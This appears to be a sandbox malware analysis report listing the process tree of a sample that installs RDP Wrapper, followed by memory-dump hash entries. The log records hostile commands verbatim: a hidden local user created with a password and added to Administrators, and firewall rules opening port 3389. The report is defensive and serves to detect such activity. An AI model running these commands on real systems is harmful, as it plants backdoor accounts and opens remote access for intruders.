                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75da10000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:4
                                                                                                            Start time:02:54:59
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
                                                                                                            Imagebase:0x400000
                                                                                                            File size:1'785'344 bytes
                                                                                                            MD5 hash:C213162C86BB943BCDF91B3DF381D2F6
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:Borland Delphi
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000000.1400805486.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: 00000004.00000000.1400872744.0000000000450000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                            • Detection: 68%, ReversingLabs
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            Target ID:8
                                                                                                            Start time:02:55:01
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\System32\netsh.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                                                                            Imagebase:0x7ff62c090000
                                                                                                            File size:96'768 bytes
                                                                                                            MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            Target ID:9
                                                                                                            Start time:02:55:02
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\System32\drivers\rdpvideominiport.sys
                                                                                                            Wow64 process (32bit):
                                                                                                            Commandline:
                                                                                                            Imagebase:
                                                                                                            File size:32'600 bytes
                                                                                                            MD5 hash:77FF15B9237D62A5CBC6C80E5B20A492
                                                                                                            Has elevated privileges:
                                                                                                            Has administrator privileges:
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:false

                                                                                                            Target ID:10
                                                                                                            Start time:02:55:02
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\System32\drivers\rdpdr.sys
                                                                                                            Wow64 process (32bit):
                                                                                                            Commandline:
                                                                                                            Imagebase:
                                                                                                            File size:169'984 bytes
                                                                                                            MD5 hash:64991B36F0BD38026F7589572C98E3D6
                                                                                                            Has elevated privileges:
                                                                                                            Has administrator privileges:
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:false

                                                                                                            Target ID:13
                                                                                                            Start time:02:55:03
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\System32\drivers\tsusbhub.sys
                                                                                                            Wow64 process (32bit):
                                                                                                            Commandline:
                                                                                                            Imagebase:
                                                                                                            File size:137'728 bytes
                                                                                                            MD5 hash:CC6D4A26254EB72C93AC848ECFCFB4AF
                                                                                                            Has elevated privileges:
                                                                                                            Has administrator privileges:
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:false

                                                                                                            Target ID:16
                                                                                                            Start time:02:55:34
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"cmd.exe" /c net user PansyBins WelTW4HnaKt3 /add
                                                                                                            Imagebase:0x410000
                                                                                                            File size:236'544 bytes
                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:17
                                                                                                            Start time:02:55:34
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75da10000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:18
                                                                                                            Start time:02:55:34
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\net.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:net user PansyBins WelTW4HnaKt3 /add
                                                                                                            Imagebase:0x900000
                                                                                                            File size:47'104 bytes
                                                                                                            MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:19
                                                                                                            Start time:02:55:34
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\net1.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\system32\net1 user PansyBins WelTW4HnaKt3 /add
                                                                                                            Imagebase:0xb10000
                                                                                                            File size:139'776 bytes
                                                                                                            MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:20
                                                                                                            Start time:02:55:34
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"cmd.exe" /c net localgroup
                                                                                                            Imagebase:0x410000
                                                                                                            File size:236'544 bytes
                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:21
                                                                                                            Start time:02:55:34
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75da10000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:22
                                                                                                            Start time:02:55:35
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\net.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:net localgroup
                                                                                                            Imagebase:0x900000
                                                                                                            File size:47'104 bytes
                                                                                                            MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:23
                                                                                                            Start time:02:55:35
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\net1.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\system32\net1 localgroup
                                                                                                            Imagebase:0xb10000
                                                                                                            File size:139'776 bytes
                                                                                                            MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:24
                                                                                                            Start time:02:55:35
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
                                                                                                            Imagebase:0x410000
                                                                                                            File size:236'544 bytes
                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:25
                                                                                                            Start time:02:55:35
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75da10000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:26
                                                                                                            Start time:02:55:35
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
                                                                                                            Imagebase:0x1770000
                                                                                                            File size:82'432 bytes
                                                                                                            MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:27
                                                                                                            Start time:02:55:35
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"cmd.exe" /c net localgroup "Administrators" PansyBins /add
                                                                                                            Imagebase:0x410000
                                                                                                            File size:236'544 bytes
                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:28
                                                                                                            Start time:02:55:35
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75da10000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:29
                                                                                                            Start time:02:55:35
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\net.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:net localgroup "Administrators" PansyBins /add
                                                                                                            Imagebase:0x900000
                                                                                                            File size:47'104 bytes
                                                                                                            MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:30
                                                                                                            Start time:02:55:35
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\net1.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\system32\net1 localgroup "Administrators" PansyBins /add
                                                                                                            Imagebase:0xb10000
                                                                                                            File size:139'776 bytes
                                                                                                            MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Teq
                                                                                                              • API String ID: 0-1098410595
                                                                                                              • Opcode ID: 4ba468d9c10f58139cf7898b1e16b6697bd3ccd39d218a863f08adf370284c1f
                                                                                                              • Instruction ID: d98a811698ea2f86c3a8a65af556ad3335958093f0a3912b48aedf6415f1379c
                                                                                                              • Opcode Fuzzy Hash: 4ba468d9c10f58139cf7898b1e16b6697bd3ccd39d218a863f08adf370284c1f
                                                                                                              • Instruction Fuzzy Hash: D2113C34A10219CFCB58EF68C458AAD7BF6BF4C610F154069E402E7354CB799C01CB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 806ad4f9a18c0304adb6dd1cbad7d19138e3d3cdb11f1edc16477e1c522e28a3
                                                                                                              • Instruction ID: 61894b703148443b5ea6d5d3f393001961ad6e99d7ff8e8efaf14137723b36f6
                                                                                                              • Opcode Fuzzy Hash: 806ad4f9a18c0304adb6dd1cbad7d19138e3d3cdb11f1edc16477e1c522e28a3
                                                                                                              • Instruction Fuzzy Hash: 30E17D70A002058FDB19EFA9D494A9EBBF2FF89310B648569D446EF359DB30AD09CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1876205f2642359764a8e2cacbd12927587d718875773a1de4af99ed97fafa25
                                                                                                              • Instruction ID: 5144da1a05c0cf1a45f28b6f9f70975c5e164a7f1a8e50256c7919ad4a79b42e
                                                                                                              • Opcode Fuzzy Hash: 1876205f2642359764a8e2cacbd12927587d718875773a1de4af99ed97fafa25
                                                                                                              • Instruction Fuzzy Hash: 59B12A34B003018FC725EFA8D5D0AAEBBE2FF88211750896CD5869B354DE75EC4ACB51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f0289c479a3a17f4847a2e8fa1c8664452a9c2a11e98284760e239e4ba63c0fe
                                                                                                              • Instruction ID: 20ec8ea46bc59e579ce40b95c5593c031db18be0ae8b19267c48c829dad660f3
                                                                                                              • Opcode Fuzzy Hash: f0289c479a3a17f4847a2e8fa1c8664452a9c2a11e98284760e239e4ba63c0fe
                                                                                                              • Instruction Fuzzy Hash: B1B11B34B003058FC764EFA8D5D0AAEBBE2FF88211750892CD5869B354DE75EC4ACB51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ffc08b674d2e7c611b032092822b6cb0794b4655dd413b8f25b64d91f0b4fd82
                                                                                                              • Instruction ID: a7de48f4466c54c5cb76b2ee73c9f548606c67dbb5ecc98dcbd3b35fada070c2
                                                                                                              • Opcode Fuzzy Hash: ffc08b674d2e7c611b032092822b6cb0794b4655dd413b8f25b64d91f0b4fd82
                                                                                                              • Instruction Fuzzy Hash: AF514C30B002124BDB1AFBAE9990A6F77E6EFC42447548629D425DF349EF70EC068BD1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fdc2274fda307a92d5d1f63c76439f37305e14132a3e2a2079a8b78017b34414
                                                                                                              • Instruction ID: 8263387db85af215ffe67516fb7868af7377738c6d631fc6ca9c720c8f475a5d
                                                                                                              • Opcode Fuzzy Hash: fdc2274fda307a92d5d1f63c76439f37305e14132a3e2a2079a8b78017b34414
                                                                                                              • Instruction Fuzzy Hash: CC518030F053059FCB69EBB8C4106AEBBF2BF89200751996ED056DB350EF35D8068B91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1572595de2d6cc38cf648ebf68ddd0c32ebfcf63f9eb403167055880f4e78dcb
                                                                                                              • Instruction ID: ec1fe8e3895f649b3d9687f6c88fabbffb5e305afc85be5c311d86d5f765afb1
                                                                                                              • Opcode Fuzzy Hash: 1572595de2d6cc38cf648ebf68ddd0c32ebfcf63f9eb403167055880f4e78dcb
                                                                                                              • Instruction Fuzzy Hash: E141376150E3C25FD30B9B3848B96997FB0AF13158F1E89DBC0C58F0A3D628581BDB62
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 183fc238a2509b782c710659cfbef92edc422b815b251fc04ee5029646788379
                                                                                                              • Instruction ID: f5cfc6cbe900f36d161e000bdc52822588db83559ee63557dffe14b3e94d7e81
                                                                                                              • Opcode Fuzzy Hash: 183fc238a2509b782c710659cfbef92edc422b815b251fc04ee5029646788379
                                                                                                              • Instruction Fuzzy Hash: D531B631F016099FDB18DFA8D4806EEBBF2AFC9360B148169E845AB315DB319D01CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7eff0a35633f9ee78bdb670dc3cb84a22ded1df708a7b6ae2182a8c7b6433e48
                                                                                                              • Instruction ID: 1fb2cb7857919986c866595ff7658dc478418f53aab00647f47b67b89e104cac
                                                                                                              • Opcode Fuzzy Hash: 7eff0a35633f9ee78bdb670dc3cb84a22ded1df708a7b6ae2182a8c7b6433e48
                                                                                                              • Instruction Fuzzy Hash: CC31A071E106099FCB1CDFA4C8909EEFB72EF89314F14856AE911AB391DB71A846CF40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 10f6010b2f55e0dc00d3a80ad4cb594098055ef9f291d4726fb6bc3a661209df
                                                                                                              • Instruction ID: d382d4d824574fdc8657c1d50e15a764ba72404df9ae84ce2757ada15770d456
                                                                                                              • Opcode Fuzzy Hash: 10f6010b2f55e0dc00d3a80ad4cb594098055ef9f291d4726fb6bc3a661209df
                                                                                                              • Instruction Fuzzy Hash: 05218170A006418FD728DF6CC454AEABBE5FF88700B14C96DD489AB655DB30E845CB61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4aa0ffc1a5a6ccf678caa22a7a7c22e33a695a98f84bba2bc2ac1e464c54b339
                                                                                                              • Instruction ID: 133666dadd37e2fd68251a82ce887a9d49ba915c3adc0ca83b5bd93c18d986b1
                                                                                                              • Opcode Fuzzy Hash: 4aa0ffc1a5a6ccf678caa22a7a7c22e33a695a98f84bba2bc2ac1e464c54b339
                                                                                                              • Instruction Fuzzy Hash: 5B219F326093D14FD317977898605DE7FB1EF831247598AD7D0D4CF1A3DA24680B8B92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b984b366feefaa433844b1f27c106743d08c3db4a10a1909151fa3d04b312966
                                                                                                              • Instruction ID: bf3e5cd32dd284d725a06dc93ef5798127e1dc8fdebf05d6ec9d99b7b3939bd6
                                                                                                              • Opcode Fuzzy Hash: b984b366feefaa433844b1f27c106743d08c3db4a10a1909151fa3d04b312966
                                                                                                              • Instruction Fuzzy Hash: CD2148797106018FC758DF69D898DAABBB1FF8962071185A8EA16CB371DB31EC04CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ef06d06366013ebb1824d391c470daafd4b2502b31c656c8bfbde214930fd657
                                                                                                              • Instruction ID: 0e9cceb3eb0a84a234e33a7b8b9f6c971c3fbaa0a63f1ff06cd06458a78ff2eb
                                                                                                              • Opcode Fuzzy Hash: ef06d06366013ebb1824d391c470daafd4b2502b31c656c8bfbde214930fd657
                                                                                                              • Instruction Fuzzy Hash: BC215A71A01219DFDB18EF69C454BAABBF1BF8C304F218569E405E72A1CB71AD45CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a1f4f4e64180da7f5cc21492e74931213ad0f562879e6a12f6a507069929cd1a
                                                                                                              • Instruction ID: 219ec9d7cdffc6db25cd162cbd5a5c05c686cd40db5f38f13c6539dc98e04beb
                                                                                                              • Opcode Fuzzy Hash: a1f4f4e64180da7f5cc21492e74931213ad0f562879e6a12f6a507069929cd1a
                                                                                                              • Instruction Fuzzy Hash: 1A2107343506108FD719EB28E494F1677FAAF89A10F2985A9E50ACB7B5CB71EC05CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 085d7ef86aead9fa276aaba67676e03947850c5e4a341a2dffc4b690b46fc336
                                                                                                              • Instruction ID: 3db0b48660a3dbb26294deb1207f06dfc77348e546b8e91cbcd2f427b568aa66
                                                                                                              • Opcode Fuzzy Hash: 085d7ef86aead9fa276aaba67676e03947850c5e4a341a2dffc4b690b46fc336
                                                                                                              • Instruction Fuzzy Hash: FA213771A00219DFDB18EF69C558BAEBBB1BF8C300F118129E405A73A1DB759D49CFA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1799773151.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10ad000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cd464a93f28a3cc92d1a423672c7ada02fc26953555667d7998857f52d9c1400
                                                                                                              • Instruction ID: 558abaea7294707562082ac613d8174cfb852bdac4647656971c7d07a00d49ff
                                                                                                              • Opcode Fuzzy Hash: cd464a93f28a3cc92d1a423672c7ada02fc26953555667d7998857f52d9c1400
                                                                                                              • Instruction Fuzzy Hash: 6B01F7714083449AF7605EE5CCC472ABFD8DF41221F58C4AAED8C1B682C2349845CB71
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3c0825f6dc99aba9bafd04c8307c981230bfaf697ef0c71aadf3347f2c3f4c10
                                                                                                              • Instruction ID: 2a819befb75953655030963ae8719b27b8bbfab64d08716c440074bbc4c405d5
                                                                                                              • Opcode Fuzzy Hash: 3c0825f6dc99aba9bafd04c8307c981230bfaf697ef0c71aadf3347f2c3f4c10
                                                                                                              • Instruction Fuzzy Hash: 9801DA32D1075A9BCB049BB8DC504ECBBB2EEC6320B164766E14137150E774252AC790
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a290a0749c3f21333c768752fd73298f1d6c1157c0571da3fa0a088e289715d9
                                                                                                              • Instruction ID: 94a54b917991c37430b8b7c063f8d64574755d9f086cc1a156665488e5be5f1a
                                                                                                              • Opcode Fuzzy Hash: a290a0749c3f21333c768752fd73298f1d6c1157c0571da3fa0a088e289715d9
                                                                                                              • Instruction Fuzzy Hash: 94013C71A003089FCB1A9FB994506DE7BFAEB4A315B1044BAE449CB255DF36D942CB90
                                                                                                              Memory Dump Source
